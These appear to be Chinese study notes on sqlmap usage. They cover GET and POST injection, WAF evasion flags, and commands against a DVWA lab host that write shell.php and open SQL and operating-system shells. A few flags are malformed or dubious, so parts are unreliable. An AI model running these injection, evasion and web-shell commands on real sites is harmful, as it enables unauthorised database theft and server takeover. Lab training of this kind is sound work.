0、内容有三(sqlmap,Havij-胡萝卜,Pangolin-穿山甲)
一、sqlmap提纲
二、学习顺序:
三、基本信息
1、GET方式注入
A、语法
基本:sqlmap -u url 后面可以跟 -f -p(当参数只有一个的时候没必要使用-p但是如果是多个参数时候例如username=aaa&pwd=aaaa时候 可以指定 -p username或者 -p pwd 或者不指定 也可) --users(用户信息) --banner(各个版本信息) --dbs(数据库信息) --all(全部信息罪毒辣)
2、POST方法注入
基本语法:
sqlmap -r 保存的post头信息文件
例如 : sqlmap -r post.txt
另外一种方法,带参数
A、带cookie的 sqlmap -u url --cookie="xxxx"
B、带data的 sqlmap -u url --data="username=admin&password=123456"
3、混淆注入
知识结构
语法:
检测对方waf : sqlmap -u url --identify-waf
绕过对方waf:
sqlmap -u url --skip-waf --random-agent 通过使用随机agent
sqlmap -u url --skip-waf --random-agent --mobile 通过手机请求 使用随机agent
sqlmap -u url --skip-waf --random-agent --mobile --level 3 risk=2 提高安全/危险等级 通过手机请求 使用随机agent
sqlmap -u url --skip-waf --random-agent --mobile --smart smart智能模式
sqlmap -u url --skip-waf --random-agent --mobile --smart --offline 减少根对方的交互
4、代理注入:
5、高级注入:
上图语法使用 或者
sqlmap -u url --level=3 --risk=3
6、数据获取
7、提权操作
语句范例:
sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --file-write="../shell.php" --file-dest="tmp/shell.php"
sqlshell:
sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --sql-shell 数据库shell
sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --os-shell 操作系统shell
sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --cmd-shell cmdshell